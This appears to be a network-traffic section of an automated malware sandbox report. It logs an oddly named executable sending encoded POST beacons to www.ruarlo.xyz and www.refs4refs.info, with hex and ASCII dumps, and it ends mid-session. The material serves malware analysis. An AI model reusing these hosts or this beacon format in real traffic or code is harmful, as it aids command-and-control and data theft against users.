                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 32 72 75 6c 2d 3d 50 75 37 4a 6d 7a 75 33 64 51 70 47 31 67 6a 62 6b 62 30 35 53 49 49 76 34 73 71 74 36 55 30 6e 74 36 71 75 78 5a 67 6e 65 58 56 73 4d 4e 30 56 38 56 47 2f 6c 34 42 59 58 63 57 7a 58 48 77 70 72 46 31 38 58 71 4f 69 30 2f 63 70 76 71 50 48 41 76 47 78 67 49 4b 74 4c 79 52 34 30 4a 4e 73 34 66 6d 4b 62 77 39 2f 46 55 7a 6a 38 4d 4d 6f 58 78 2b 56 36 36 45 3d 26 48 68 3d 67 36 42 6c 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO"}</script></head></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        5192.168.11.2049797162.0.231.203805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:53:56.174999952 CEST799OUTPOST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 66 44 38 6c 4e 4d 6b 46 47 31 39 63 7a 78 59 55 41 47 6c 63 38 46 4d 44 5a 6a 46 46 73 6d 78 61 4f 69 6b 37 65 55 35 79 6f 57 6c 4b 2b 61 75 44 7a 63 4e 7a 55 55 31 48 5a 6d 74 76 68 70 61 62 30 6f 34 46 54 4b 30 6d 4d 39 4b 4f 6f 51 74 75 59 4f 56 52 53 5a 6e 57 68 58 7a 69 73 51 44 45 36 43 34 67 59 6e 43 62 32 33 49 51 67 43 36 72 79 4b 42 6d 37 53 35 6d 6e 55 6d 2b 68 37 78 32 5a 42 52 50 36 52 2b 66 39 6d 44 6e 50 4e 63 31 31 5a 79 33 45 74 6f 72 73 34 4b 65 6b 69 39 6e 58 6a 61 44 56 39 4a 2f 68 73 42 2b 2b 4c 69 49 66 61 59 70 51 4c 36 30 6b 30 2b 64 45 51 41 48 31 67 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=fD8lNMkFG19czxYUAGlc8FMDZjFFsmxaOik7eU5yoWlK+auDzcNzUU1HZmtvhpab0o4FTK0mM9KOoQtuYOVRSZnWhXzisQDE6C4gYnCb23IQgC6ryKBm7S5mnUm+h7x2ZBRP6R+f9mDnPNc11Zy3Etors4Keki9nXjaDV9J/hsB++LiIfaYpQL60k0+dEQAH1g==
                                                                                                                                                                                                                        Oct 23, 2024 18:53:59.499102116 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:53:56 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        6192.168.11.2049798162.0.231.203805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:53:58.862000942 CEST819OUTPOST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 66 44 38 6c 4e 4d 6b 46 47 31 39 63 7a 56 63 55 4d 46 64 63 74 31 4d 41 57 44 46 46 6c 47 78 65 4f 69 6f 37 65 56 74 69 6f 67 31 4b 39 37 65 44 79 5a 78 7a 58 55 31 48 52 47 74 71 76 4a 61 6d 30 6f 30 6a 54 4f 6f 6d 4d 39 65 4f 6f 56 52 75 66 39 39 4f 54 4a 6e 55 30 48 7a 67 6f 51 44 45 36 43 34 67 59 6e 57 68 32 33 67 51 6a 79 71 72 77 72 42 6e 34 53 34 55 33 6b 6d 2b 6c 37 77 78 5a 42 51 71 36 55 6e 36 39 67 48 6e 50 4d 4d 31 77 59 79 30 4e 74 6f 74 76 49 4b 56 67 53 70 73 59 51 32 4c 46 66 4e 38 6e 2b 4e 73 37 64 76 53 43 6f 73 4e 54 59 6d 47 67 45 48 31 47 53 42 63 6f 6b 64 35 41 54 6c 47 5a 70 50 30 7a 50 66 4e 73 58 51 6e 4d 53 49 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=fD8lNMkFG19czVcUMFdct1MAWDFFlGxeOio7eVtiog1K97eDyZxzXU1HRGtqvJam0o0jTOomM9eOoVRuf99OTJnU0HzgoQDE6C4gYnWh23gQjyqrwrBn4S4U3km+l7wxZBQq6Un69gHnPMM1wYy0NtotvIKVgSpsYQ2LFfN8n+Ns7dvSCosNTYmGgEH1GSBcokd5ATlGZpP0zPfNsXQnMSI=
                                                                                                                                                                                                                        Oct 23, 2024 18:54:00.236774921 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:53:58 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        7192.168.11.2049799162.0.231.203805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:01.551112890 CEST7968OUTPOST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 66 44 38 6c 4e 4d 6b 46 47 31 39 63 7a 56 63 55 4d 46 64 63 74 31 4d 41 57 44 46 46 6c 47 78 65 4f 69 6f 37 65 56 74 69 6f 67 39 4b 39 4e 4b 44 30 36 5a 7a 57 55 31 48 66 6d 74 72 76 4a 61 42 30 72 45 6e 54 4f 6b 32 4d 2f 6d 4f 71 7a 6c 75 61 4d 39 4f 63 4a 6e 55 32 48 7a 6a 73 51 43 65 36 43 6f 73 59 6e 47 68 32 33 67 51 6a 77 43 72 33 36 42 6e 2b 53 35 6d 6e 55 6d 36 68 37 78 57 5a 42 59 51 36 55 54 41 39 51 6e 6e 50 74 38 31 33 36 61 30 52 39 6f 76 71 49 4c 56 67 53 30 30 59 51 71 78 46 66 4a 57 6e 35 52 73 32 62 53 2b 64 62 73 68 49 4c 47 2b 36 45 4c 53 4a 52 74 75 71 30 38 4e 47 31 70 39 47 2f 6e 7a 38 4d 33 42 70 58 56 6e 52 69 35 5a 4e 62 34 47 46 63 4b 74 44 2b 6f 64 58 43 6f 67 42 4b 34 67 49 57 6e 62 47 76 37 73 46 63 63 6e 6a 71 55 6c 35 74 4c 4a 42 56 4a 69 41 33 48 36 58 2f 39 65 50 7a 71 74 76 61 41 69 2b 58 6c 70 62 36 71 61 43 74 54 7a 78 73 67 48 2b 76 47 2b 64 59 65 41 58 5a 39 63 46 67 65 4a 57 51 34 64 52 70 42 6a 39 61 77 67 37 51 67 70 6d 6b 55 46 46 46 38 7a [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: 2rul-=fD8lNMkFG19czVcUMFdct1MAWDFFlGxeOio7eVtiog9K9NKD06ZzWU1HfmtrvJaB0rEnTOk2M/mOqzluaM9OcJnU2HzjsQCe6CosYnGh23gQjwCr36Bn+S5mnUm6h7xWZBYQ6UTA9QnnPt8136a0R9ovqILVgS00YQqxFfJWn5Rs2bS+dbshILG+6ELSJRtuq08NG1p9G/nz8M3BpXVnRi5ZNb4GFcKtD+odXCogBK4gIWnbGv7sFccnjqUl5tLJBVJiA3H6X/9ePzqtvaAi+Xlpb6qaCtTzxsgH+vG+dYeAXZ9cFgeJWQ4dRpBj9awg7QgpmkUFFF8zXWYXlbtghmb5EkaGZp2nnWSyTRDO08l4EfjUededA98lvBmcO7ri1xHKSEePL9WQUGZbLvsyatPrfeB5frvIpRYgP6eWOu0gtIeUq6i524SdfUe60G8MYfLWtHMoVkIZ/WusczghzQPSFv0xxTuQQf/A+eF21VMqpEHqshz8w06llOAyjS67BIogxEuI1ubM23F3j2CUcHBek+uICsZJPj9q2k6YUUhsOcwSdCv4ONBJ+uVAIn6rv/2z7Gjw5wZNEs/asH+4QlQQ6tyFva1Fr3DBIR+oY+Rs9VDnRL8FosyDXVU3XxD8eXUL9p+5XyiShxJfqo4GDrGsSszWnKonpnaFEY7lVJ42n9iFG0DCZj1Vg5c+eQy6yqhWRiiHVr3Fxxv9cR4gVn3daI/ooRDUlIaoFdlL77+owzL8M4iHc8eosKX7rNGQyrRLh14RH8SCzYz3q7zZ/YeUdrcyZmytwb5wWx02XC7fNi9bl75zMJbl5SsEC8VTsSeoktMMOzoVrbnGRhHMtstQ+sAqhZGXpyhIvfNcMJDixNmoJcIQdV8L1PTAQz+heqKtEv20mEmQkWvla0CZ/GVO5myYrAv+WeNCfiIzf7PCUKgDZgkr3BOCn968Uo0Ry7x5vyxYwwsyZcgu2cDYW9TgYXmWPCpW3xiMuR/ndOVcWZ [TRUNCATED]
                                                                                                                                                                                                                        Oct 23, 2024 18:54:02.607786894 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:01 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        8192.168.11.2049800162.0.231.203805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.247908115 CEST532OUTGET /443n/?Hh=g6BlO&2rul-=SBUFO7UKbQxT/A0NMCw1slRydQol8mxlPD8CditPqx9i+IWA5JxkazMedHBluKiV/JkaYuM+MOSFojVsVdVmUJrzgHDhlyielwZPRH6/6joZww29waA6pwk= HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:54:04.432800055 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:54:04 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        9192.168.11.20498013.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:09.719887018 CEST811OUTPOST /2x6z/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.refs4refs.info
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.refs4refs.info/2x6z/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 33 75 38 2b 44 77 55 57 38 58 59 35 6f 47 66 55 74 69 5a 30 75 75 37 47 5a 4f 65 57 71 41 72 6b 77 6d 31 6e 50 64 59 53 4a 68 4e 75 54 71 56 67 6b 74 46 42 35 70 4e 67 56 5a 5a 79 61 32 66 4b 6a 57 76 2f 2f 59 42 43 73 61 53 65 44 4b 38 6c 6c 67 2b 6c 38 2f 38 51 66 59 34 6d 79 75 39 36 4b 68 61 58 78 65 33 59 55 79 38 38 52 70 59 72 67 4e 4f 33 33 31 6b 61 7a 77 4a 48 50 6c 49 36 59 41 4f 6a 70 71 37 6b 57 6f 66 76 45 33 77 66 53 73 59 66 50 45 70 48 64 55 76 54 65 41 79 59 44 68 45 5a 78 52 68 66 45 71 4e 34 46 68 6a 72 57 30 61 4e 33 5a 78 35 42 33 46 77 66 59 72 75 55 77 3d 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5oGfUtiZ0uu7GZOeWqArkwm1nPdYSJhNuTqVgktFB5pNgVZZya2fKjWv//YBCsaSeDK8llg+l8/8QfY4myu96KhaXxe3YUy88RpYrgNO331kazwJHPlI6YAOjpq7kWofvE3wfSsYfPEpHdUvTeAyYDhEZxRhfEqN4FhjrW0aN3Zx5B3FwfYruUw==


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        10192.168.11.20498023.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:12.360245943 CEST831OUTPOST /2x6z/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.refs4refs.info
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.refs4refs.info/2x6z/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Raw: 32 72 75 6c 2d 3d 33 75 38 2b 44 77 55 57 38 58 59 35 70 6d 76 55 72 42 68 30 6e 75 37 42 57 75 65 57 7a 51 72 2f 77 6d 35 6e 50 63 4e 66 4a 7a 5a 75 54 4c 46 67 69 63 46 42 38 70 4e 67 4e 70 5a 4e 48 47 66 37 6a 58 54 5a 2f 59 74 43 73 61 57 65 44 50 41 6c 6c 52 2b 69 39 76 38 53 54 34 34 34 38 4f 39 36 4b 68 61 58 78 65 53 44 55 79 30 38 52 35 6f 72 69 6f 79 30 70 6c 6b 5a 6a 67 4a 48 5a 6c 4a 39 59 41 4f 42 70 72 6e 4f 57 75 54 76 45 31 6f 66 53 35 6b 59 56 55 70 46 58 30 75 64 51 56 53 55 62 7a 30 30 77 53 56 66 4c 36 52 77 4a 58 75 78 4c 47 75 70 30 4b 74 4c 46 48 38 59 64 61 71 31 4a 36 75 4c 6d 70 48 6c 6f 52 4f 74 6a 64 42 71 59 46 4f 4c 75 45 59 3d
                                                                                                                                                                                                                        Data Ascii: 2rul-=3u8+DwUW8XY5pmvUrBh0nu7BWueWzQr/wm5nPcNfJzZuTLFgicFB8pNgNpZNHGf7jXTZ/YtCsaWeDPAllR+i9v8ST4448O96KhaXxeSDUy08R5orioy0plkZjgJHZlJ9YAOBprnOWuTvE1ofS5kYVUpFX0udQVSUbz00wSVfL6RwJXuxLGup0KtLFH8Ydaq1J6uLmpHloROtjdBqYFOLuEY=


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        11192.168.11.20498033.33.130.190805492C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Oct 23, 2024 18:54:15.000437975 CEST5156OUTPOST /2x6z/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.refs4refs.info
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.refs4refs.info
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
